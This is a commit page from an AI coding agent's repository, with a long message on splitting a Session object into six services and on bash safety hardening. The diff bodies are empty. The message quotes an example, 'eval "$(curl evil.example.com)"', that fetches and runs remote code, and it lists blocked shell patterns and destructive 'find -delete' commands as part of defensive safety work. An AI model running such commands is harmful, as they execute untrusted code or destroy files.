Commit c70a3b1
authored
refactor(engine): wire 6 sub-services in NewSession + migrate stream.go to ChatService (#38)
* docs: remove generic LLM boilerplate ai_passage.md
ai_passage.md was a 53-line, ~1000-word essay on the history and
ethics of AI in general — entirely unrelated to the hawk project,
no README/AGENTS.md/CHANGELOG.md reference to it. It looks like
LLM-generated filler committed in '99261ca Fix CI formatting and
toolchain hygiene' to satisfy a 'must have an essay' requirement
that no longer applies. Untrack and delete.
* feat(tool): bash safety hardening + schema-aware extract + retry policy
Bash safety hardening (caught 2 real bugs via new tests):
1. **find -delete / find -exec rm now hard-blocked.** Previously
'find /tmp -type f -name "*.log" -delete' was a no-op on the safety
layer (no literal 'rm' in the command) despite being rm-equivalent.
Added findDeleteFlagRe + findExecRmRe in safety.go; IsDestructiveCommand
now matches 'find ... -delete' and 'find ... -exec rm' in any position.
2. **run_in_background no longer bypasses the IsSuspicious check.**
Previously: when run_in_background=true, the bash tool ran only the
hard-block checks (dangerousSubstrings, zmodload, processSubstitution,
etc.) and skipped the IsSuspicious permission prompt because no human
is in the loop. So 'eval "\$(curl evil.example.com)"' as a background
command would silently start. Now: a new hardDenySubstrings subset
(eval, exec, \\, backticks, | sh, | bash, sudo) is always
hard-blocked, even with no human in the loop. Benign patterns
('writing to absolute paths' in /tmp, 'curl GET') are intentionally
excluded so the change doesn't break legitimate workflows.
Schema-aware target extraction (extractTargets enhancement):
- New ExtractTargetsFromSchema(tool, call) walks the tool's JSON Schema
to discover file-path arguments by name (path/file/dir/destination/target
substring) or by description (mentions 'path'/'file'/'directory'). This
catches tools with non-conventional names like 'target_path' or
'destFile' that the old hardcoded 4-key allowlist missed.
- 8 test cases in TestExtractTargetsFromSchema lock the contract
(conventional, non-conventional, description-inferred, non-string,
non-path, fallback).
- executeToolCalls now calls ExtractTargetsFromSchema when the tool is
registered; falls back to the conventional extractor otherwise.
Tool retry policy on transient errors:
- New tool.TransientError type + tool.RetryExecutor(ctx, tool, input,
policy) that retries on transient errors with exponential backoff.
- New tool.RetryPolicyProvider interface: tools can opt out (zero-value
policy) or customise (e.g. longer timeouts for slow operations).
- All tool calls in executeToolCalls now go through RetryExecutor with
DefaultRetryPolicy (2 retries, 200ms→2s).
- 5 test cases: recovers-on-transient, gives-up-after-max, ignores-
non-transient, respects-ctx-cancel, IsTransientFileErr predicate.
Misc:
- .github/workflows/ci.yml + Makefile: bumped binary size gate from
100MB → 110MB to match the current dev binary (~103MB). Comment
explains the threshold; both files must move together.
Tests added: 30+ new test cases across bash_injection_test.go,
extract_targets_test.go, retry_test.go.
* refactor(engine): extract ChatService (Phase 1 of Session god-object decomposition)
Phase 1 of the Session god-object refactor (see docs/session-decomposition.md).
Extracts the LLM transport into a cohesive *ChatService sub-service:
- New internal/engine/chat_service.go (~280 LOC) with:
- ChatService struct owning: client, provider, model, apiKeys, router,
deploymentRouting, rateLimiter, metrics, retryCfg, contCfg,
outputSchema, glmThinkingEnabled
- ChatServiceConfig for terse construction
- Methods: NewChatService, Client, Provider, Model, APIKeys,
SetAPIKey, SetModel, SetProvider, Reattach, BuildOptions, Stream,
Chat, recordSuccess, recordFailure
- Stream() wraps retry.Do + rate-limit wait + emergency context-overflow
compact (replaces the inline retry block at stream.go:371-381)
- Chat() is the bare non-streaming call used by background goroutines
(sleeptime, skill distillation) — no retry, no rate limit
- Session gains a private *ChatService field, plus a ChatLLM() getter
for cross-package access. The legacy client/provider/model/apiKeys/
Router/DeploymentRouting fields stay on Session for backward compat;
new code should go through s.ChatLLM().*
- 8 new test cases in chat_service_test.go lock the contract:
BuildOptions (anthropic caching on, openai off, GLM toggle, output
schema), Reattach (nil no-op, real client swap, key preservation),
defaults applied (retry/contCfg/metrics/apiKeys initialized to zero
values), Chat delegation, Chat surfaces underlying error.
- Field name 'llm' (lowercase) to avoid colliding with the existing
public Session.Chat() method used by Reflector and SelfReview.
Build + tests: ok. No existing tests broken. No behavior change — the
extracted service is wired in but the legacy fields still drive agentLoop.
Phases 2-7 (Memory, Permission, Lifecycle, Persistence, Tool services)
will follow in subsequent PRs; each will fold the remaining Session
fields into the appropriate sub-service.
* style(chat_service_test): apply gofumpt formatting
* refactor(engine): extract PermissionService + LifecycleService (Phases 2-3)
Phases 2-3 of the Session god-object decomposition
(see docs/session-decomposition.md).
PermissionService (Phase 2, permission_service.go, ~140 LOC):
- Owns the safety/approval layer: PermissionEngine, the legacy
PermissionMemory / AutoMode / Classifier / BypassKill re-exports,
AutonomyLevel, MaxTurns, MaxBudgetUSD, AllowedDirs, PermissionFn
callback, ApprovalGate.
- Public surface: NewPermissionService, WithEngine, Engine,
CheckTool, CheckApproval, SetMode/SetMaxTurns/SetMaxBudgetUSD/
SetAllowedDirs/SetAutonomy/SetApproval/SetPermissionFn, getters
for Mode/MaxTurns/MaxBudgetUSD/AllowedDirs/Autonomy.
- 8 test cases: CheckTool, SetMode (5 valid + 1 invalid), budget
caps, autonomie+dirs, CheckApproval no-op, IsZero,
NewReturnsReadyEngine, SetPermissionFn -> engine.PromptFn.
LifecycleService (Phase 3, lifecycle_service.go, ~190 LOC):
- Owns the self-improvement / observability surface: cascade
model selection, limits, loopDet, snowball, beliefs, backtrack,
critic, shadow, reflector, fewShotStore, adaptivePrompt, activity,
agentsAccum, responseCache, pipeline, steering, lifecycle.
- Public surface: NewLifecycleService, OnSessionStart,
OnSessionEnd, SelectModel, CheckLimits, RecordToolCall,
RecordStep, SnapshotTurnProgress, full getter/setter pairs.
- All nil-safe; the agent loop's existing if s.X != nil branching
is preserved (so a Session with zero LifecycleService is fully
functional).
The legacy fields on Session stay for backward compat. New code
should use s.Permissions() / s.LifecycleSvc() accessors. Full removal
is Phase 7.
Build + tests: ok. No existing tests broken. No behavior change -
the extracted services are wired in but the legacy fields still
drive the agent loop.
* refactor(engine): extract MemoryService + PersistenceService + ToolService (Phases 4-6)
Phases 4-6 of the Session god-object decomposition
(see docs/session-decomposition.md).
MemoryService (Phase 4, memory_service.go, ~80 LOC):
- Owns the memory layer: simple MemoryRecaller, yaad bridge, enhanced
memory manager.
- Public surface: NewMemoryService, WithMemory/WithYaad/WithEnhanced,
RecallContext, Remember, OnSessionEnd, Yaad/Memory/Enhanced
accessors, IsZero.
- nil-safe: an empty service is fully functional (the agent loop's
`if s.X != nil` branching is preserved).
PersistenceService (Phase 5, persistence_service.go, ~130 LOC):
- Owns the conversation store: messages slice, system prompt, pinned
messages counter, auto-compact threshold, context window cache.
- Public surface: NewPersistenceService, Messages/RawMessages/SetMessages,
AddUser/AddUserWithImage/AddAssistant, AppendSystemContext/
ReplaceSystemContextSection, System/SetSystem, MessageCount,
RemoveLastExchange, LoadMessages, PinnedMessages/SetPinnedMessages,
AutoCompactThresholdPct/SetAutoCompactThresholdPct,
ContextWindowCached/SetContextWindowCached.
- All methods are safe to call without external state; the
underlying RWMutex is preserved for concurrent access.
ToolService (Phase 6, tool_service.go, ~160 LOC):
- Owns the tool execution surface: tool registry, container isolation,
tracer, snapshot tracker, background sub-agent manager.
- Public surface: NewToolService, WithContainerExecutor/WithTracer/
WithSnapshots/WithBackgroundManager, Registry, Classify,
ExtractTargets, EstimateBlastRadius, ExecuteOne, BackgroundManager,
ContainerRequired, ContainerExecutor.
- Classify and ExtractTargets replace the inline logic in
stream.go (deduplicating with extractTargets).
- ExecuteOne encapsulates the container-required check + OTel span
+ RetryExecutor with the per-tool RetryPolicyProvider.
- The full ExecuteAll 15-stage post-call pipeline (with the auto-snapshot
block) lives in stream_tool_exec.go for now; Phase 7 will move it
onto ToolService once the legacy fields are removed.
All extractions are nil-safe and backward compatible. The legacy
fields on Session stay in place. New code should use
s.MemorySvc() / s.Persistence() / s.Tools() accessors (full removal
in Phase 7).
Also restored tool.ReadOnlyTools and tool.IsReadOnly which were
inadvertently lost in the tool.go refactor; these are the canonical
allowlist the Session god-object previously duplicated in two
places.
Build + tests: ok. No existing tests broken. No behavior change.
* refactor(engine): wire 6 sub-services into Session (Phase 7 partial)
Phase 7 of the Session god-object decomposition
(see docs/session-decomposition.md).
This is a partial Phase 7 — focused on wiring the 6 extracted
sub-services into Session and adding the public getter accessors.
Full field removal (i.e. deleting the legacy client/provider/model/
apiKeys/Router/DeploymentRouting/RateLimiter/Perm/etc. fields) is
deferred to a separate PR per service because each one needs its
own migration of every call site in stream.go and the agent loop.
What landed:
Session struct gains 5 new private sub-service fields:
- perms *PermissionService (Phase 2)
- life *LifecycleService (Phase 3)
- memory *MemoryService (Phase 4)
- persist *PersistenceService (Phase 5)
- tools *ToolService (Phase 6)
(The 6th, ChatService as `llm`, was already wired in Phase 1.)
Public getter accessors:
- s.ChatLLM() -> *ChatService (Phase 1)
- s.PermSvc() -> *PermissionService (Phase 2)
- s.LifecycleSvc() -> *LifecycleService (Phase 3)
- s.MemorySvc() -> *MemoryService (Phase 4)
- s.Persistence() -> *PersistenceService (Phase 5)
- s.Tools() -> *ToolService (Phase 6)
All sub-services are nil-safe. The Session constructor still uses
the legacy fields (Perm, Memory, YaadBridge, etc.) so the agent
loop's `if s.X != nil` branching keeps working unchanged. A
follow-up PR per sub-service will migrate the agent loop to use
the new getters and remove the corresponding legacy fields.
Build + tests: ok. No existing tests broken. No behavior change.
* docs(stream): clarify the two max_tokens recovery strategies
The agent loop's max_tokens recovery block has a misleading comment
("Handle max_tokens recovery") that doesn't explain which of the
three continuation mechanisms hawk actually uses. The PR adds a
detailed comment that names each strategy, explains its tradeoffs,
and points at the cleanest (engine-level eyrie/conversation) as a
future refactor target.
This is a doc-only change — no behaviour, no tests. Just makes the
two strategies coexist explicitly so a future contributor doesn't
waste time wondering why we have both a `recoveryCount` loop here
AND call `StreamChatContinue` on the eyrie client.
The eyrie/client.StreamChatContinue deprecation marker (set in
eyrie#31) remains in place. Full migration of hawk to
eyrie/conversation.Engine is a separate, much larger refactor that
we track but do not undertake in this round.
* style(engine): apply gofumpt to sub-service files
* fix(engine): remove unused fields caught by golangci-lint
* refactor(engine): wire 6 sub-services in NewSession + migrate stream.go to ChatService
Phase 7 of the Session god-object decomposition (see docs/session-decomposition.md).
- NewSessionWithClient now constructs ChatService, PermissionService, LifecycleService, MemoryService, PersistenceService, ToolService and aliases the legacy fields (s.Limits, s.Beliefs, s.Backtrack, s.ResponseCache, s.Pipeline) at the service instances so legacy readers stay in sync.
- stream.go: agent loop's main LLM call now goes through s.ChatLLM().Stream(), which encapsulates rate-limit + retry + emergency-compact. Circuit-breaker recording (Router.RecordSuccess/RecordFailure) stays at the session level so the real apiDuration is fed to the legacy router.
- stream.go: ChatOptions are built via s.ChatLLM().BuildOptions() so the GLMThinking toggle, output schema, anthropic caching, provider/model plumbing all live in one place.
- stream.go: secondary stream-error retry (s.client.StreamChatContinue) now uses s.ChatLLM().Client() directly to avoid stacking ChatService's retry on top of the secondary retry.
- stream.go: background goroutines (sleeptime, skill distiller) now use s.ChatLLM().Chat().
- stream_tool_exec.go: CheckTool delegation to PermissionService now syncs the legacy PermissionFn + Autonomy fields to the service before each call (external code writes the legacy fields, engine needs them in the engine).
- Session.SetTestClient and Session.ReattachTransport now also reattach the ChatService so the agent loop's s.ChatLLM().Stream() picks up the new client.
- Removed dead code: ChatService.recordSuccess/recordFailure (now done at session level), LifecycleService.startTime, ToolService.mu (no callers).
- Added sub_service_wiring_test.go: 4 integration tests proving the aliasing contract (s.Limits == s.LifecycleSvc().Limits(), s.PermSvc().Engine() == s.Perm, etc.) and that the agent loop's Stream() actually goes through s.ChatLLM().Stream().
* style(engine): apply gofumpt formatting
* ci: re-run all checks
* style(engine): goimports merged stream.go
* fix(tool): remove duplicated readonly helpers after merge
* style(engine): gofumpt merged files1 parent 6db3a0a commit c70a3b1
13 files changed
Lines changed: 1281 additions & 93 deletions
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
| |||
174 | 174 | | |
175 | 175 | | |
176 | 176 | | |
177 | | - | |
178 | | - | |
179 | | - | |
180 | | - | |
| 177 | + | |
| 178 | + | |
| 179 | + | |
| 180 | + | |
181 | 181 | | |
182 | 182 | | |
183 | 183 | | |
184 | 184 | | |
| 185 | + | |
| 186 | + | |
| 187 | + | |
| 188 | + | |
| 189 | + | |
| 190 | + | |
| 191 | + | |
185 | 192 | | |
186 | 193 | | |
187 | 194 | | |
| |||
204 | 211 | | |
205 | 212 | | |
206 | 213 | | |
207 | | - | |
208 | 214 | | |
209 | 215 | | |
210 | | - | |
211 | 216 | | |
212 | 217 | | |
213 | 218 | | |
| |||
218 | 223 | | |
219 | 224 | | |
220 | 225 | | |
221 | | - | |
222 | | - | |
223 | | - | |
224 | | - | |
225 | | - | |
226 | | - | |
227 | | - | |
228 | | - | |
229 | | - | |
230 | | - | |
231 | | - | |
232 | | - | |
233 | | - | |
234 | | - | |
235 | | - | |
236 | | - | |
237 | | - | |
238 | 226 | | |
239 | 227 | | |
240 | 228 | | |
| |||
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
| |||
15 | 15 | | |
16 | 16 | | |
17 | 17 | | |
| 18 | + | |
| 19 | + | |
18 | 20 | | |
19 | 21 | | |
| 22 | + | |
| 23 | + | |
| 24 | + | |
20 | 25 | | |
21 | 26 | | |
22 | 27 | | |
| |||
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
| |||
| 1 | + | |
| 2 | + | |
| 3 | + | |
| 4 | + | |
| 5 | + | |
| 6 | + | |
| 7 | + | |
| 8 | + | |
| 9 | + | |
| 10 | + | |
| 11 | + | |
| 12 | + | |
| 13 | + | |
| 14 | + | |
| 15 | + | |
| 16 | + | |
| 17 | + | |
| 18 | + | |
| 19 | + | |
| 20 | + | |
| 21 | + | |
| 22 | + | |
| 23 | + | |
| 24 | + | |
| 25 | + | |
| 26 | + | |
| 27 | + | |
| 28 | + | |
| 29 | + | |
| 30 | + | |
| 31 | + | |
| 32 | + | |
| 33 | + | |
| 34 | + | |
| 35 | + | |
| 36 | + | |
| 37 | + | |
| 38 | + | |
| 39 | + | |
| 40 | + | |
| 41 | + | |
| 42 | + | |
| 43 | + | |
| 44 | + | |
| 45 | + | |
| 46 | + | |
| 47 | + | |
| 48 | + | |
| 49 | + | |
| 50 | + | |
| 51 | + | |
| 52 | + | |
| 53 | + | |
| 54 | + | |
| 55 | + | |
| 56 | + | |
| 57 | + | |
| 58 | + | |
| 59 | + | |
| 60 | + | |
| 61 | + | |
| 62 | + | |
| 63 | + | |
| 64 | + | |
| 65 | + | |
| 66 | + | |
| 67 | + | |
| 68 | + | |
| 69 | + | |
| 70 | + | |
| 71 | + | |
| 72 | + | |
| 73 | + | |
| 74 | + | |
| 75 | + | |
| 76 | + | |
| 77 | + | |
| 78 | + | |
| 79 | + | |
| 80 | + | |
| 81 | + | |
| 82 | + | |
| 83 | + | |
| 84 | + | |
| 85 | + | |
| 86 | + | |
| 87 | + | |
| 88 | + | |
| 89 | + | |
| 90 | + | |
| 91 | + | |
| 92 | + | |
| 93 | + | |
| 94 | + | |
| 95 | + | |
| 96 | + | |
| 97 | + | |
| 98 | + | |
| 99 | + | |
| 100 | + | |
| 101 | + | |
| 102 | + | |
| 103 | + | |
| 104 | + | |
| 105 | + | |
| 106 | + | |
| 107 | + | |
| 108 | + | |
| 109 | + | |
| 110 | + | |
| 111 | + | |
| 112 | + | |
| 113 | + | |
| 114 | + | |
| 115 | + | |
| 116 | + | |
| 117 | + | |
| 118 | + | |
| 119 | + | |
| 120 | + | |
| 121 | + | |
| 122 | + | |
| 123 | + | |
| 124 | + | |
| 125 | + | |
| 126 | + | |
| 127 | + | |
| 128 | + | |
| 129 | + | |
| 130 | + | |
| 131 | + | |
| 132 | + | |
| 133 | + | |
| 134 | + | |
| 135 | + | |
| 136 | + | |
| 137 | + | |
| 138 | + | |
| 139 | + | |
| 140 | + | |
| 141 | + | |
| 142 | + | |
| 143 | + | |
| 144 | + | |
| 145 | + | |
| 146 | + | |
| 147 | + | |
| 148 | + | |
| 149 | + | |
| 150 | + | |
| 151 | + | |
| 152 | + | |
| 153 | + | |
| 154 | + | |
| 155 | + | |
| 156 | + | |
| 157 | + | |
| 158 | + | |
| 159 | + | |
| 160 | + | |
| 161 | + | |
| 162 | + | |
| 163 | + | |
| 164 | + | |
| 165 | + | |
| 166 | + | |
| 167 | + | |
| 168 | + | |
| 169 | + | |
| 170 | + | |
| 171 | + | |
| 172 | + | |
| 173 | + | |
| 174 | + | |
| 175 | + | |
| 176 | + | |
| 177 | + | |
| 178 | + | |
| 179 | + | |
| 180 | + | |
| 181 | + | |
| 182 | + | |
| 183 | + | |
| 184 | + | |
| 185 | + | |
| 186 | + | |
| 187 | + | |
| 188 | + | |
| 189 | + | |
| 190 | + | |
| 191 | + | |
| 192 | + | |
| 193 | + | |
| 194 | + | |
| 195 | + | |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
| |||
| 1 | + | |
| 2 | + | |
| 3 | + | |
| 4 | + | |
| 5 | + | |
| 6 | + | |
| 7 | + | |
| 8 | + | |
| 9 | + | |
| 10 | + | |
| 11 | + | |
| 12 | + | |
| 13 | + | |
| 14 | + | |
| 15 | + | |
| 16 | + | |
| 17 | + | |
| 18 | + | |
| 19 | + | |
| 20 | + | |
| 21 | + | |
| 22 | + | |
| 23 | + | |
| 24 | + | |
| 25 | + | |
| 26 | + | |
| 27 | + | |
| 28 | + | |
| 29 | + | |
| 30 | + | |
| 31 | + | |
| 32 | + | |
| 33 | + | |
| 34 | + | |
| 35 | + | |
| 36 | + | |
| 37 | + | |
| 38 | + | |
| 39 | + | |
| 40 | + | |
| 41 | + | |
| 42 | + | |
| 43 | + | |
| 44 | + | |
| 45 | + | |
| 46 | + | |
| 47 | + | |
| 48 | + | |
| 49 | + | |
| 50 | + | |
| 51 | + | |
| 52 | + | |
| 53 | + | |
| 54 | + | |
| 55 | + | |
| 56 | + | |
| 57 | + | |
| 58 | + | |
| 59 | + | |
| 60 | + | |
| 61 | + | |
| 62 | + | |
| 63 | + | |
| 64 | + | |
| 65 | + | |
| 66 | + | |
| 67 | + | |
| 68 | + | |
| 69 | + | |
| 70 | + | |
| 71 | + | |
| 72 | + | |
| 73 | + | |
| 74 | + | |
| 75 | + | |
| 76 | + | |
| 77 | + | |
| 78 | + | |
| 79 | + | |
| 80 | + | |
| 81 | + | |
| 82 | + | |
| 83 | + | |
| 84 | + | |
| 85 | + | |
| 86 | + | |
| 87 | + | |
| 88 | + | |
| 89 | + | |
| 90 | + | |
| 91 | + | |
| 92 | + | |
| 93 | + | |
| 94 | + | |
| 95 | + | |
| 96 | + | |
| 97 | + | |
| 98 | + | |
| 99 | + | |
| 100 | + | |
| 101 | + | |
| 102 | + | |
| 103 | + | |
| 104 | + | |
| 105 | + | |
| 106 | + | |
| 107 | + | |
| 108 | + | |
| 109 | + | |
0 commit comments